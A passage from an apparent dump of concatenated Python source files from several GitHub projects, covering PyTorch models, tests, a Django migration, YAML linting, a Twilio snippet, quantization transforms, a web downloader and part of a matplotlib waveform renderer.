weight = self.get_w(torch.cat((key, value), dim=-1)).squeeze(-1)
mask = sequence_mask(seq_len + 1, maxlen=maxlen, device=device)
mask = mask.repeat(1, 3) # (batch, 9*3)
weight[~mask] = float("-inf")
weight = weight.softmax(dim=-1).unsqueeze(dim=-1)
out = (value * weight).sum(dim=1)
out = self.fc(out)
return out
class NNAttention(nn.Module):
def __init__(self, in_dim, out_dim):
super().__init__()
self.q_net = nn.Linear(in_dim, out_dim)
self.k_net = nn.Linear(in_dim, out_dim)
self.v_net = nn.Linear(in_dim, out_dim)
def forward(self, Q, K, V):
q = self.q_net(Q)
k = self.k_net(K)
v = self.v_net(V)
attn = torch.einsum("ijk,ilk->ijl", q, k)
attn = attn.to(Q.device)
attn_prob = torch.softmax(attn, dim=-1)
attn_vec = torch.einsum("ijk,ikl->ijl", attn_prob, v)
return attn_vec
class Reshape(nn.Module):
def __init__(self, *args):
super(Reshape, self).__init__()
self.shape = args
def forward(self, x):
return x.view(self.shape)
class DARNN(nn.Module):
def __init__(self, device="cpu", **kargs):
super().__init__()
self.emb_dim = kargs["emb_dim"]
self.hidden_size = kargs["hidden_size"]
self.num_layers = kargs["num_layers"]
self.is_bidir = kargs["is_bidir"]
self.dropout = kargs["dropout"]
self.seq_len = kargs["seq_len"]
self.interval = kargs["interval"]
self.today_length = 238
self.prev_length = 240
self.input_length = 480
self.input_size = 6
self.rnn = nn.LSTM(
input_size=self.input_size + self.emb_dim,
hidden_size=self.hidden_size,
num_layers=self.num_layers,
batch_first=True,
bidirectional=self.is_bidir,
dropout=self.dropout,
)
self.prev_rnn = nn.LSTM(
input_size=self.input_size,
hidden_size=self.hidden_size,
num_layers=self.num_layers,
batch_first=True,
bidirectional=self.is_bidir,
dropout=self.dropout,
)
self.fc_out = nn.Linear(in_features=self.hidden_size * 2, out_features=1)
self.attention = NNAttention(self.hidden_size, self.hidden_size)
self.act_out = nn.Sigmoid()
if self.emb_dim != 0:
self.pos_emb = nn.Embedding(self.input_length, self.emb_dim)
def forward(self, inputs):
inputs = inputs.view(-1, self.input_length, self.input_size) # [B, T, F]
today_input = inputs[:, : self.today_length, :]
today_input = torch.cat((torch.zeros_like(today_input[:, :1, :]), today_input), dim=1)
prev_input = inputs[:, 240 : 240 + self.prev_length, :]
if self.emb_dim != 0:
embedding = self.pos_emb(torch.arange(end=self.today_length + 1, device=inputs.device))
embedding = embedding.repeat([today_input.size()[0], 1, 1])
today_input = torch.cat((today_input, embedding), dim=-1)
prev_outs, _ = self.prev_rnn(prev_input)
today_outs, _ = self.rnn(today_input)
outs = self.attention(today_outs, prev_outs, prev_outs)
outs = torch.cat((today_outs, outs), dim=-1)
outs = outs[:, range(0, self.seq_len * self.interval, self.interval), :]
# outs = self.fc_out(outs).squeeze()
return self.act_out(self.fc_out(outs).squeeze(-1)), outs
class Transpose(nn.Module):
def __init__(self, dim1=0, dim2=1):
super().__init__()
self.dim1 = dim1
self.dim2 = dim2
def forward(self, x):
return x.transpose(self.dim1, self.dim2)
class SelfAttention(nn.Module):
def __init__(self, *args, **kargs):
super().__init__()
self.attention = nn.MultiheadAttention(*args, **kargs)
def forward(self, x):
return self.attention(x, x, x)[0]
def onehot_enc(y, len):
y = y.unsqueeze(-1)
y_onehot = torch.zeros(y.shape[0], len)
# y_onehot.zero_()
y_onehot.scatter(1, y, 1)
return y_onehot
def sequence_mask(lengths, maxlen=None, dtype=torch.bool, device=None):
if maxlen is None:
maxlen = lengths.max()
mask = ~(torch.ones((len(lengths), maxlen), device=device).cumsum(dim=1).t() > lengths).t()
mask.type(dtype)
return mask
|
utokenize/testdata/basic_multilevel.py
|
MaxTurchin/pycopy-lib
| 126 |
128682
|
<gh_stars>100-1000
def foo():
if 1:
if 2:
pass
|
client/test/monit_perf.py
|
elgalu/labml
| 463 |
128691
|
import time
import torch
from labml import monit, logger
from labml.logger import Text
N = 10_000
def no_section():
arr = torch.zeros((1000, 1000))
for i in range(N):
for t in range(10):
arr += 1
def section():
arr = torch.zeros((1000, 1000))
for i in range(N):
with monit.section('run'):
for t in range(10):
arr += 1
def section_silent():
arr = torch.zeros((1000, 1000))
for i in range(N):
with monit.section('run', is_silent=True):
for t in range(10):
arr += 1
def main():
start = time.time()
no_section()
logger.log('No Section: ', (f'{time.time() - start}', Text.value))
start = time.time()
section()
logger.log('Section: ', (f'{time.time() - start}', Text.value))
start = time.time()
section_silent()
logger.log('Silent Section: ', (f'{time.time() - start}', Text.value))
if __name__ == '__main__':
main()
|
zcls/model/attention_helper.py
|
ZJCV/PyCls
| 110 |
128720
|
# -*- coding: utf-8 -*-
"""
@date: 2020/12/30 下午4:44
@file: attention_helper.py
@author: zj
@description:
"""
from zcls.model.layers.global_context_block import GlobalContextBlock2D
from zcls.model.layers.squeeze_and_excitation_block import SqueezeAndExcitationBlock2D
from zcls.model.layers.non_local_embedded_gaussian import NonLocal2DEmbeddedGaussian
from zcls.model.layers.simplified_non_local_embedded_gaussian import SimplifiedNonLocal2DEmbeddedGaussian
def make_attention_block(in_planes, reduction, attention_type, **kwargs):
if attention_type == 'GlobalContextBlock2D':
return GlobalContextBlock2D(in_channels=in_planes, reduction=reduction)
elif attention_type == 'SqueezeAndExcitationBlock2D':
return SqueezeAndExcitationBlock2D(in_channels=in_planes, reduction=reduction, **kwargs)
elif attention_type == 'NonLocal2DEmbeddedGaussian':
return NonLocal2DEmbeddedGaussian(in_channels=in_planes)
elif attention_type == 'SimplifiedNonLocal2DEmbeddedGaussian':
return SimplifiedNonLocal2DEmbeddedGaussian(in_channels=in_planes)
else:
raise ValueError('no matching type')
|
scale/job/migrations/0045_auto_20180830_1812.py
|
kaydoh/scale
| 121 |
128733
|
<gh_stars>100-1000
# -*- coding: utf-8 -*-
# Generated by Django 1.11.15 on 2018-08-30 18:12
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('job', '0044_jobtypetag_job_type'),
]
operations = [
migrations.AddField(
model_name='jobexecution',
name='docker_image',
field=models.TextField(null=True),
),
migrations.AddField(
model_name='jobtyperevision',
name='docker_image',
field=models.TextField(default=''),
),
migrations.AlterField(
model_name='jobtype',
name='docker_image',
field=models.CharField(default='', max_length=500),
),
]
|
lib/ansiblereview/vars.py
|
tonyskidmore/ansible-review
| 222 |
128742
|
import codecs
import yaml
from yaml.composer import Composer
from ansiblereview import Result, Error
def hunt_repeated_yaml_keys(data):
"""Parses yaml and returns a list of repeated variables and
the line on which they occur
"""
loader = yaml.Loader(data)
def compose_node(parent, index):
# the line number where the previous token has ended (plus empty lines)
line = loader.line
node = Composer.compose_node(loader, parent, index)
node.__line__ = line + 1
return node
def construct_mapping(node, deep=False):
mapping = dict()
errors = dict()
for key_node, value_node in node.value:
key = key_node.value
if key in mapping:
if key in errors:
errors[key].append(key_node.__line__)
else:
errors[key] = [mapping[key], key_node.__line__]
mapping[key] = key_node.__line__
return errors
loader.compose_node = compose_node
loader.construct_mapping = construct_mapping
data = loader.get_single_data()
return data
def repeated_vars(candidate, settings):
with codecs.open(candidate.path, 'r') as f:
errors = hunt_repeated_yaml_keys(f) or dict()
return Result(candidate, [Error(err_line, "Variable %s occurs more than once" % err_key)
for err_key in errors for err_line in errors[err_key]])
|
tests/test_utils.py
|
wkcn/MobulaOP
| 161 |
128747
|
from mobula.utils import get_git_hash
def test_get_git_hash():
git_hash = get_git_hash()
assert type(git_hash) == str, (git_hash, type(git_hash))
assert len(git_hash) == 7 or git_hash == 'custom', git_hash
def test_edict():
from mobula.internal.edict import edict
data = edict(a=3, b=4)
assert 'a' in data
assert hasattr(data, 'a')
assert 'b' in data
assert hasattr(data, 'b')
assert len(data) == 2
assert data['a'] == 3
assert data['b'] == 4
data.a = 5
assert data['a'] == 5
data.a += 3
assert data['a'] == 8
data.update(dict(c=6))
assert 'c' in data
assert data['c'] == 6
data['c'] += 1
assert data['c'] == 7
del data.b
assert 'b' not in data
assert not hasattr(data, 'b')
assert len(data) == 2
del data['a']
assert 'a' not in data
assert len(data) == 1
|
tests/test_level1/test_class.py
|
kianmeng/soupsieve
| 130 |
128755
|
"""Test class selectors."""
from .. import util
from soupsieve import SelectorSyntaxError
class TestClass(util.TestCase):
"""Test class selectors."""
MARKUP = """
<div>
<p>Some text <span id="1" class="foo"> in a paragraph</span>.
<a id="2" class="bar" href="http://google.com">Link</a>
</p>
</div>
"""
# Browsers normally replace NULL with `\uFFFD`, but some of the parsers
# we test just strip out NULL, so we will simulate and just insert `\uFFFD` directly
# to ensure consistent behavior in our tests across parsers.
MARKUP_NULL = """
<div>
<p>Some text <span id="1" class="foo\ufffd"> in a paragraph</span>.
<a id="2" class="\ufffdbar" href="http://google.com">Link</a>
</p>
</div>
"""
def test_class(self):
"""Test class."""
self.assert_selector(
self.MARKUP,
".foo",
["1"],
flags=util.HTML
)
def test_type_and_class(self):
"""Test type and class."""
self.assert_selector(
self.MARKUP,
"a.bar",
["2"],
flags=util.HTML
)
def test_type_and_class_escaped_null(self):
"""Test type and class with an escaped null character."""
self.assert_selector(
self.MARKUP_NULL,
r"a.\0 bar",
["2"],
flags=util.HTML
)
def test_type_and_class_escaped_eof(self):
"""Test type and class with an escaped EOF."""
self.assert_selector(
self.MARKUP_NULL,
"span.foo\\",
["1"],
flags=util.HTML
)
def test_malformed_class(self):
"""Test malformed class."""
# Malformed class
self.assert_raises('td.+#some-id', SelectorSyntaxError)
def test_class_xhtml(self):
"""Test tag and class with XHTML since internally classes are stored different for XML."""
self.assert_selector(
self.wrap_xhtml(self.MARKUP),
".foo",
["1"],
flags=util.XHTML
)
def test_multiple_classes(self):
"""Test multiple classes."""
markup = """
<div>
<p>Some text <span id="1" class="foo"> in a paragraph</span>.
<a id="2" class="bar" href="http://google.com">Link</a>
<a id="3" class="foo" href="http://google.com">Link</a>
<a id="4" class="foo bar" href="http://google.com">Link</a>
</p>
</div>
"""
self.assert_selector(
markup,
"a.foo.bar",
["4"],
flags=util.HTML
)
def test_malformed_pseudo_class(self):
"""Test malformed class."""
# Malformed pseudo-class
self.assert_raises('td:#id', SelectorSyntaxError)
|
jaxlie/hints/__init__.py
|
brentyi/jaxlie
| 128 |
128756
|
<reponame>brentyi/jaxlie<filename>jaxlie/hints/__init__.py
from typing import NamedTuple, Union
import numpy as onp
from jax import numpy as jnp
# Type aliases for JAX/Numpy arrays; primarily for function inputs
Array = Union[onp.ndarray, jnp.ndarray]
"""Type alias for `Union[jnp.ndarray, onp.ndarray]`.
"""
Scalar = Union[float, Array]
"""Type alias for `Union[float, Array]`.
"""
Matrix = Array
"""Type alias for `Array`. Should not be instantiated.
Refers to a square matrix, typically with shape `(Group.matrix_dim, Group.matrix_dim)`.
For adjoints, shape should be `(Group.tangent_dim, Group.tangent_dim)`.
"""
Vector = Array
"""Type alias for `Array`. Should not be instantiated.
Refers to a general 1D array.
"""
TangentVector = Array
"""Type alias for `Array`. Should not be instantiated.
Refers to a 1D array with shape `(Group.tangent_dim,)`.
"""
# Type aliases for JAX arrays; primarily for function outputs
ArrayJax = jnp.ndarray
"""Type alias for jnp.ndarray."""
ScalarJax = ArrayJax
"""Type alias for jnp.ndarray."""
MatrixJax = ArrayJax
"""Type alias for jnp.ndarray."""
VectorJax = ArrayJax
"""Type alias for jnp.ndarray."""
TangentVectorJax = ArrayJax
"""Type alias for jnp.ndarray."""
class RollPitchYaw(NamedTuple):
"""Tuple containing roll, pitch, and yaw Euler angles."""
roll: Scalar
pitch: Scalar
yaw: Scalar
__all__ = [
"Array",
"Scalar",
"Matrix",
"Vector",
"TangentVector",
"ArrayJax",
"ScalarJax",
"MatrixJax",
"VectorJax",
"TangentVectorJax",
"RollPitchYaw",
]
|
messaging/services/service-multiple-number-add/service-multiple-number-add.6.x.py
|
Tshisuaka/api-snippets
| 234 |
128760
|
<reponame>Tshisuaka/api-snippets
# Download the Python helper library from twilio.com/docs/python/install
import os
from twilio.rest import Client
# Your Account Sid and Auth Token from twilio.com/console
# To set up environmental variables, see http://twil.io/secure
account_sid = os.environ['TWILIO_ACCOUNT_SID']
auth_token = os.environ['TWILIO_AUTH_TOKEN']
client = Client(account_sid, auth_token)
phone_numbers_sids = [
"PN<KEY>", "PN557ce644e5ab84fa21cc21112e22c485",
"PN<KEY>"
]
for phone_numbers_sid in phone_numbers_sids:
phone_number = client.messaging \
.services(sid="MG2172dd2db502e20dd981ef0d67850e1a") \
.phone_numbers \
.create(phone_number_sid=phone_numbers_sid)
print(phone_number.sid)
|
src/finn/transformation/qonnx/quant_act_to_multithreshold.py
|
mmrahorovic/finn
| 109 |
128774
|
<filename>src/finn/transformation/qonnx/quant_act_to_multithreshold.py
# Copyright (c) 2021, Xilinx
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# * Neither the name of FINN nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import warnings
from finn.transformation.base import Transformation
from finn.transformation.qonnx.qonnx_activation_handlers import QuantActBaseHandler
def default_filter_function_generator(max_multithreshold_bit_width=8):
"""
This function generates the default filter function for the
ConvertQuantActToMultiThreshold transformation. Per default the returned
function disables the conversion of Quant nodes which have a bit width above 8 bit.
This function generator can be used as a template to write custom
filter functions.
"""
def filter_function(model, q_node):
if q_node.op_type == "Quant":
bit_width = model.get_initializer(q_node.input[3])
elif q_node.op_type == "BipolarQuant":
bit_width = 1.0
else:
raise RuntimeError("Got an unexpected quantizer node type")
if bit_width is None:
raise ValueError("Quant nodes must have a static bit width.")
if bit_width > max_multithreshold_bit_width:
warnings.warn(
f'The Quant node with name: "{q_node.name}" was not converted to a '
f"MultiThreshold node, because its bit width of {bit_width} is "
f"higher than the configured maximum bit width of "
f"{max_multithreshold_bit_width}."
)
return False
return True
return filter_function
class ConvertQuantActToMultiThreshold(Transformation):
"""
Converts Quant nodes in the activation path to MultiThreshold nodes.
The optional keyword argument `filter_function`
presents a way to control which Quant and BipolarQuant nodes in the activation path
are converted to MultiThreshold nodes. A warning will be emitted when a Quant node
is not converted to a MultiThreshold node.
:param filter_function: Each candidate Quant and BinaryQant node is first evaluated
by this function. If the function returns False,
then the node is not converted to a MultiTrheshold node.
The function is given the model and candidate node as parameters.
Per default a filter function is inserted, which disables the conversion of
Quant nodes, which have a bit width of larger than 8.
Defaults to: default_filter_function_generator(max_multithreshold_bit_width=8)
"""
def __init__(
self,
filter_function=default_filter_function_generator(
max_multithreshold_bit_width=8
),
):
super().__init__()
self._filter_function = filter_function
def apply(self, model):
graph = model.graph
node_ind = 0
graph_modified = False
for n in graph.node:
node_ind += 1
if n.op_type == "Quant" or n.op_type == "BipolarQuant":
# Check that the node is in the activation path
inp = model.get_initializer(n.input[0])
out = model.get_initializer(n.output[0])
if not (inp is None and out is None):
continue
predecessor = model.find_direct_predecessors(n)
if predecessor is not None:
predecessor_op_type = predecessor[0].op_type
else:
predecessor_op_type = predecessor
if model.is_fork_node(n):
raise ValueError(
"Forking Quant/BipolarQuant nodes are currently "
"not supported by FINN."
)
if n.op_type == "Quant" and not model.get_initializer(n.input[2]) == 0:
raise ValueError(
"Only Quant nodes with zero-point == 0 are currently supported."
)
# Check that this node passes the user filter
if not self._filter_function(model, n):
warnings.warn(
f'The Quant node with name: "{n.name}" was not converted to a '
f"MultiThreshold node, because the filtering function "
f"returned False for this node."
)
continue
# Check for possible ambiguity in handler selection
valid_predecessors = []
for cls in QuantActBaseHandler.__subclasses__():
valid_predecessors.extend(cls.valid_predecessor_op_types)
if len(valid_predecessors) != len(set(valid_predecessors)):
raise RuntimeError(
"Two or more activation handlers declare the same "
"type of valid predecessor node. "
"This leads to ambiguity in the handler selection "
"and must thus be avoided."
)
# Try to find a fitting handler for this Quant activation node
for handler_cls in QuantActBaseHandler.__subclasses__():
if predecessor_op_type in handler_cls.valid_predecessor_op_types:
handler = handler_cls(model, n, node_ind)
break
else:
raise ValueError(
f"Quant nodes in the activation path and with predecessor "
f"nodes of type {predecessor_op_type} are currently not "
f"supported by FINN and can not be converted to "
f"MultiThreshold nodes."
)
model = handler.replace_quant_node()
graph_modified = True
return (model, graph_modified)
return (model, graph_modified)
|
scripts/watch_continuous.py
|
drozzy/autonomous-learning-library
| 584 |
128820
|
# pylint: disable=unused-import
import argparse
from all.bodies import TimeFeature
from all.environments import GymEnvironment, PybulletEnvironment
from all.experiments import load_and_watch
from .continuous import ENVS
def main():
parser = argparse.ArgumentParser(description="Watch a continuous agent.")
parser.add_argument("env", help="ID of the Environment")
parser.add_argument("filename", help="File where the model was saved.")
parser.add_argument(
"--device",
default="cuda",
help="The name of the device to run the agent on (e.g. cpu, cuda, cuda:0)",
)
parser.add_argument(
"--fps",
default=120,
help="Playback speed",
)
args = parser.parse_args()
if args.env in ENVS:
env = GymEnvironment(args.env, device=args.device)
elif 'BulletEnv' in args.env or args.env in PybulletEnvironment.short_names:
env = PybulletEnvironment(args.env, device=args.device)
else:
env = GymEnvironment(args.env, device=args.device)
load_and_watch(args.filename, env, fps=args.fps)
if __name__ == "__main__":
main()
|
modules/__init__.py
|
Kandongwe/RunestoneServer
| 344 |
128821
|
<filename>modules/__init__.py
# **************************
# |docname| - web2py modules
# **************************
# .. toctree::
# :maxdepth: 2
# :glob:
#
# *.py
|
notebooks/exercise_solutions/n01_vector_dot_product.py
|
pydy/pydy-tutorial-human-standing
| 134 |
128829
|
from sympy import acos
N = ReferenceFrame('N')
v1 = a * N.x + b * N.y + a * N.z
v2 = b * N.x + a * N.y + b * N.z
acos(v1.dot(v2) / (v1.magnitude() * v2.magnitude()))
|
AndroidSpider/html_downloader.py
|
lidenghong1/SmallReptileTraining
| 133 |
128865
|
from http import cookiejar
from urllib import request, error
from urllib.parse import urlparse
class HtmlDownLoader(object):
def download(self, url, retry_count=3, headers=None, proxy=None, data=None):
if url is None:
return None
try:
req = request.Request(url, headers=headers, data=data)
cookie = cookiejar.CookieJar()
cookie_process = request.HTTPCookieProcessor(cookie)
opener = request.build_opener()
if proxy:
proxies = {urlparse(url).scheme: proxy}
opener.add_handler(request.ProxyHandler(proxies))
content = opener.open(req).read()
except error.URLError as e:
print('HtmlDownLoader download error:', e.reason)
content = None
if retry_count > 0:
if hasattr(e, 'code') and 500 <= e.code < 600:
#说明是 HTTPError 错误且 HTTP CODE 为 5XX 范围说明是服务器错误,可以尝试再次下载
return self.download(url, retry_count-1, headers, proxy, data)
return content
|
run_server.py
|
vagnervjs/frame-player
| 233 |
128866
|
<gh_stars>100-1000
# run_server.py
import SimpleHTTPServer
m = SimpleHTTPServer.SimpleHTTPRequestHandler.extensions_map
m[''] = 'text/plain'
m.update(dict([(k, v + ';charset=UTF-8') for k, v in m.items()]))
SimpleHTTPServer.test()
|
corrscope/renderer.py
|
corrscope/corrscope
| 140 |
128871
|
<reponame>corrscope/corrscope<gh_stars>100-1000
"""
Backend implementations should not inherit from RendererFrontend,
since they don't need to know.
Implementation: Multiple inheritance:
Renderer inherits from (RendererFrontend, backend implementation).
Backend implementation does not know about RendererFrontend.
"""
import enum
import math
import os
from abc import ABC, abstractmethod
from collections import defaultdict
from typing import (
Optional,
List,
TYPE_CHECKING,
Any,
Callable,
TypeVar,
Sequence,
Type,
Union,
Tuple,
Dict,
DefaultDict,
MutableSequence,
)
# DO NOT IMPORT MATPLOTLIB UNTIL WE DELETE mpl_config_dir!
import attr
import numpy as np
import corrscope.generate
from corrscope.channel import ChannelConfig, Channel
from corrscope.config import DumpableAttrs, with_units, TypedEnumDump
from corrscope.layout import (
RendererLayout,
LayoutConfig,
unique_by_id,
RegionSpec,
Edges,
)
from corrscope.util import coalesce, obj_name
"""
On first import, matplotlib.font_manager spends nearly 10 seconds
building a font cache.
PyInstaller redirects matplotlib's font cache to a temporary folder,
deleted after the app exits. This is because in one-file .exe mode,
matplotlib-bundled fonts are extracted and deleted whenever the app runs,
and font cache entries point to invalid paths.
- https://github.com/pyinstaller/pyinstaller/issues/617
- https://github.com/pyinstaller/pyinstaller/blob/c06d853c0c4df7480d3fa921851354d4ee11de56/PyInstaller/loader/rthooks/pyi_rth_mplconfig.py#L35-L37
corrscope uses one-folder mode
and deletes all matplotlib-bundled fonts to save space. So reenable global font cache.
"""
mpl_config_dir = "MPLCONFIGDIR"
if mpl_config_dir in os.environ:
del os.environ[mpl_config_dir]
# matplotlib.use() only affects pyplot. We don't use pyplot.
import matplotlib
import matplotlib.cm
import matplotlib.colors
from matplotlib.backends.backend_agg import FigureCanvasAgg
from matplotlib.figure import Figure
if TYPE_CHECKING:
from matplotlib.artist import Artist
from matplotlib.axes import Axes
from matplotlib.backend_bases import FigureCanvasBase
from matplotlib.colors import ListedColormap
from matplotlib.lines import Line2D
from matplotlib.spines import Spine
from matplotlib.text import Text, Annotation
# Used by outputs.py.
ByteBuffer = Union[bytes, np.ndarray, memoryview]
def default_color() -> str:
# import matplotlib.colors
# colors = np.array([int(x, 16) for x in '1f 77 b4'.split()], dtype=float)
# colors /= np.amax(colors)
# colors **= 1/3
#
# return matplotlib.colors.to_hex(colors, keep_alpha=False)
return "#ffffff"
T = TypeVar("T")
class LabelX(enum.Enum):
Left = enum.auto()
Right = enum.auto()
def match(self, *, left: T, right: T) -> T:
if self is self.Left:
return left
if self is self.Right:
return right
raise ValueError("failed match")
class LabelY(enum.Enum):
Bottom = enum.auto()
Top = enum.auto()
def match(self, *, bottom: T, top: T) -> T:
if self is self.Bottom:
return bottom
if self is self.Top:
return top
raise ValueError("failed match")
class LabelPosition(TypedEnumDump):
def __init__(self, x: LabelX, y: LabelY):
self.x = x
self.y = y
LeftBottom = (LabelX.Left, LabelY.Bottom)
LeftTop = (LabelX.Left, LabelY.Top)
RightBottom = (LabelX.Right, LabelY.Bottom)
RightTop = (LabelX.Right, LabelY.Top)
class Font(DumpableAttrs, always_dump="*"):
# Font file selection
family: Optional[str] = None
bold: bool = False
italic: bool = False
# Font size
size: float = with_units("pt", default=20)
# QFont implementation details
toString: str = None
class RendererConfig(
DumpableAttrs, always_dump="*", exclude="viewport_width viewport_height"
):
width: int
height: int
line_width: float = with_units("px", default=1.5)
grid_line_width: float = with_units("px", default=1.0)
@property
def divided_width(self):
return round(self.width / self.res_divisor)
@property
def divided_height(self):
return round(self.height / self.res_divisor)
bg_color: str = "#000000"
init_line_color: str = default_color()
@property
def global_line_color(self) -> str:
return self.init_line_color
# Whether to color lines by the pitch of the current note.
global_color_by_pitch: bool = False
# 12 colors, representing how to color pitches C through B.
pitch_colors: List[str] = corrscope.generate.spectral_colors
grid_color: Optional[str] = None
stereo_grid_opacity: float = 0.25
midline_color: str = "#404040"
v_midline: bool = False
h_midline: bool = False
# Label settings
label_font: Font = attr.ib(factory=Font)
label_position: LabelPosition = LabelPosition.LeftTop
# The text will be located (label_padding_ratio * label_font.size) from the corner.
label_padding_ratio: float = with_units("px/pt", default=0.5)
label_color_override: Optional[str] = None
@property
def get_label_color(self):
return coalesce(self.label_color_override, self.global_line_color)
antialiasing: bool = True
# Performance (skipped when recording to video)
res_divisor: float = 1.0
# Debugging only
viewport_width: float = 1
viewport_height: float = 1
def __attrs_post_init__(self) -> None:
# round(np.int32 / float) == np.float32, but we want int.
assert isinstance(self.width, (int, float))
assert isinstance(self.height, (int, float))
assert len(self.pitch_colors) == 12, len(self.pitch_colors)
# Both before_* functions should be idempotent, AKA calling twice does no harm.
def before_preview(self) -> None:
"""Called *once* before preview. Does nothing."""
pass
def before_record(self) -> None:
"""Called *once* before recording video. Eliminates res_divisor."""
self.res_divisor = 1
def gen_circular_cmap(colors: List[str]):
colors = list(colors)
# `colors` has 12 distinct entries.
# LinearSegmentedColormap(colors) takes a real number `x` between 0 and 1,
# and maps x=0 to colors[0] and x=1 to colors[-1].
# pitch_cmap should be periodic, so `colors[0]` should appear at both x=0 and x=1.
colors.append(colors[0])
cmap = matplotlib.colors.LinearSegmentedColormap.from_list(
"12-tone spectrum", colors, N=256, gamma=1.0
)
return cmap
def freq_to_color(cmap, freq: Optional[float], fallback_color: str) -> str:
if not freq:
return fallback_color
key_number = 12 * math.log2(freq / 440) + 69
color = cmap(math.fmod(key_number, 12) / 12)
return color
@attr.dataclass
class LineParam:
color: str
color_by_pitch: bool
@attr.dataclass
class RenderInput:
# Should Renderer store a Wave and take an int?
# Or take an array on each frame?
data: np.ndarray
freq_estimate: Optional[float]
@staticmethod
def stub_new(data: np.ndarray) -> "RenderInput":
"""
Stable function to construct a RenderInput given only a data array.
Used mainly for tests.
"""
return RenderInput(data, None)
@staticmethod
def wrap_datas(datas: List[np.ndarray]) -> List["RenderInput"]:
"""
Stable function to construct a list of RenderInput given only datas.
Used mainly for tests.
"""
return [RenderInput.stub_new(data) for data in datas]
UpdateLines = Callable[[List[RenderInput]], Any]
UpdateOneLine = Callable[[np.ndarray], Any]
@attr.dataclass
class CustomLine:
stride: int
_xdata: np.ndarray = attr.ib(converter=np.array)
@property
def xdata(self) -> np.ndarray:
return self._xdata
@xdata.setter
def xdata(self, value):
self._xdata = np.array(value)
set_xdata: UpdateOneLine
set_ydata: UpdateOneLine
@property
@abstractmethod
def abstract_classvar(self) -> Any:
"""A ClassVar to be overriden by a subclass."""
class _RendererBackend(ABC):
"""
Renderer backend which takes data and produces images.
Does not touch Wave or Channel.
"""
# Class attributes and methods
bytes_per_pixel: int = abstract_classvar
ffmpeg_pixel_format: str = abstract_classvar
@staticmethod
@abstractmethod
def color_to_bytes(c: str) -> np.ndarray:
"""
Returns integer ndarray of length RGB_DEPTH.
This must return ndarray (not bytes or list),
since the caller performs arithmetic on the return value.
Only used for tests/test_renderer.py.
"""
# Instance initializer
def __init__(
self,
cfg: RendererConfig,
lcfg: "LayoutConfig",
dummy_datas: List[np.ndarray],
channel_cfgs: Optional[List["ChannelConfig"]],
channels: List["Channel"],
):
self.cfg = cfg
self.lcfg = lcfg
self.w = cfg.divided_width
self.h = cfg.divided_height
# Maps a continuous variable from 0 to 1 (representing one octave) to a color.
self.pitch_cmap = gen_circular_cmap(cfg.pitch_colors)
self.nplots = len(dummy_datas)
if self.nplots > 0:
assert len(dummy_datas[0].shape) == 2, dummy_datas[0].shape
self.wave_nsamps = [data.shape[0] for data in dummy_datas]
self.wave_nchans = [data.shape[1] for data in dummy_datas]
if channel_cfgs is None:
channel_cfgs = [ChannelConfig("") for _ in range(self.nplots)]
if len(channel_cfgs) != self.nplots:
raise ValueError(
f"cannot assign {len(channel_cfgs)} colors to {self.nplots} plots"
)
self._line_params = [
LineParam(
color=coalesce(ccfg.line_color, cfg.global_line_color),
color_by_pitch=coalesce(ccfg.color_by_pitch, cfg.global_color_by_pitch),
)
for ccfg in channel_cfgs
]
# Load channel strides.
if channels is not None:
if len(channels) != self.nplots:
raise ValueError(
f"cannot assign {len(channels)} channels to {self.nplots} plots"
)
self.render_strides = [channel.render_stride for channel in channels]
else:
self.render_strides = [1] * self.nplots
# Instance functionality
@abstractmethod
def add_lines_stereo(
self, dummy_datas: List[np.ndarray], strides: List[int]
) -> UpdateLines:
...
@abstractmethod
def get_frame(self) -> ByteBuffer:
...
@abstractmethod
def add_labels(self, labels: List[str]) -> Any:
...
# Primarily used by RendererFrontend, not outside world.
@abstractmethod
def _add_xy_line_mono(
self, wave_idx: int, xs: Sequence[float], ys: Sequence[float], stride: int
) -> CustomLine:
...
# See Wave.get_around() and designNotes.md.
# Viewport functions
def calc_limits(N: int, viewport_stride: float) -> Tuple[float, float]:
halfN = N // 2
max_x = N - 1
return np.array([-halfN, -halfN + max_x]) * viewport_stride
def calc_center(viewport_stride: float) -> float:
return -0.5 * viewport_stride
# Line functions
def calc_xs(N: int, stride: int) -> Sequence[float]:
halfN = N // 2
return (np.arange(N) - halfN) * stride
Point = float
Pixel = float
# Matplotlib multiplies all widths by (inch/72 units) (AKA "matplotlib points").
# To simplify code, render output at (72 px/inch), so 1 unit = 1 px.
# For font sizes, convert from font-pt to pixels.
# (Font sizes are used far less than pixel measurements.)
PX_INCH = 72
PIXELS_PER_PT = 96 / 72
def px_from_points(pt: Point) -> Pixel:
return pt * PIXELS_PER_PT
class AbstractMatplotlibRenderer(_RendererBackend, ABC):
"""Matplotlib renderer which can use any backend (agg, mplcairo).
To pick a backend, subclass and set _canvas_type at the class level.
"""
_canvas_type: Type["FigureCanvasBase"] = abstract_classvar
@staticmethod
@abstractmethod
def _canvas_to_bytes(canvas: "FigureCanvasBase") -> ByteBuffer:
pass
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
dict.__setitem__(
